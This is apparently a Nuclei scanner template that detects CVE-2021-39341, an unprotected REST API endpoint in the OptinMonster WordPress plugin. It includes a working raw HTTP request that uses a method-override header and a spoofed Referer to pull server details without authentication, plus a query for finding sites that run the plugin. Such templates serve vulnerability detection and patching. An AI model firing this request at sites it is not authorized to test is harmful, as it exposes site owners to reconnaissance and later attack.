id: CVE-2021-39341

info:
  name: OptinMonster Plugin < 2.6.5 - Unprotected REST-API
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The OptinMonster WordPress plugin is vulnerable to sensitive information disclosure and unauthorized setting updates due to insufficient authorization validation via the logged_in_or_has_api_key function in the ~/OMAPI/RestApi.php file that can be used to inject malicious web scripts on sites with the plugin installed. This affects versions up to, and including, 2.6.4.
  impact: |
    Unauthenticated attackers can access sensitive system information including PHP version, server configuration, and plugin details via unprotected REST API endpoints.
  remediation: |
    Upgrade to OptinMonster version 2.6.5 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39341
    - https://plugins.trac.wordpress.org/browser/optinmonster/trunk/OMAPI/RestApi.php?rev=2606519#L1460
    - https://wordfence.com/vulnerability-advisories/#CVE-2021-39341
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2021-39341
    cwe-id: CWE-285,CWE-863
    epss-score: 0.44317
    epss-percentile: 0.97623
    cpe: cpe:2.3:a:optinmonster:optinmonster:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: optinmonster
    product: optinmonster
    framework: wordpress
    publicwww-query: "/wp-content/plugins/optinmonster"
  tags: cve,cve2021,wordpress,wp-plugin,optinmonster,rest-api,disclosure,unauth,exposure,vkev,vuln

http:
  - raw:
      - |
        OPTIONS /wp-json/omapp/v1/support HTTP/1.1
        Host: {{Hostname}}
        X-HTTP-Method-Override: GET
        Referer: https://wp.app.optinmonster.test

    matchers:
      - type: word
        part: body
        words:
          - "PHP Version"
          - "OptinMonster"
          - '"functions.php"'
          - "Server Info"
        condition: and
# digest: 4a0a004730450221009300e018459b74a562c35d9a1b6e4921fb506368354fba9c9f92b556886ac28702206d92673d2d71d4b02ec61e43c7f78851da7241666245858ad7d63adceed28a4e:922c64590222798bb761d5b6d8e72950